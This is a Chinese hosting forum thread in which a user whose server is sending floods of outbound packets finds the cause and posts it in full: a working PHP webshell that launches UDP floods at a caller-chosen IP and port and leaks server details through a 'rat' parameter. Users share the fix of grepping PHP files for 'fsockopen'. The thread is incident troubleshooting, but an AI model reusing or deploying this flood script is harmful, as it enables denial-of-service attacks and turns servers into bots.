切换到nginx+apache马上对外发包卡死 切换到apache暂时没有问题
有遇到相关问题的朋友嘛,请告知,是网站被挂马了,还是服务器被搞成肉鸡了? 应该是被挂UDP的马了被挂马了,切apache一样会有问题的,也许只是时间巧合 [b]回复 [url=http://www.wdlinux.cn/bbs/redirect.php?goto=findpost&pid=31808&ptid=8081]2#[/url] [i]admin[/i] [/b]
老大的 有什么好的解决办法嘛? [attach]4048[/attach]
老大能告知一个哪个比较可疑吗? 看这里,看不出来的
你查下你的服务器上有没马文件就是了 [b]回复 [url=http://www.wdlinux.cn/bbs/redirect.php?goto=findpost&pid=31843&ptid=8081]5#[/url] [i]admin[/i] [/b]
景安技术让我下载回来查杀,快有40G文件,也不方便啊。 LINUX 文件下的文件不是太熟悉,有些晕啊。 [table=98%]
[tr][td][table=98%]
[tr][td]现在防火墙里面关闭了UDP对外发包 只开放了 DNS 不知道能不能行[/td][/tr]
[/table]
[/td][/tr]
[tr][/tr]
[/table] <?php
set_time_limit(999999);
$host = $_GET['ip'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
echo "Warning to: opening";
exit;
}
for($i=0;$i<$Sendlen;$i++){
$out .= "A";
}
$max_time = time()+$exec_time;
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "Send Host:$host:$port<br><br>";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>
哈哈 老大 木马让我找到了 给大家分享一下办法 查找字符串grep -r "fsockopen" ./ 然后一个个分析 很好,正是此马
其实不用下载所有的文件,只要查找PHP类型的文件即可 [b]回复 [url=http://www.wdlinux.cn/bbs/redirect.php?goto=findpost&pid=31890&ptid=8081]9#[/url] [i]admin[/i] [/b]
:hug:谢谢老大 只要查找PHP类型的文件即可,是什么意思?今天我服务器也不稳定,机房说是服务器发包,怎么解决呢,我晕
页:
[1]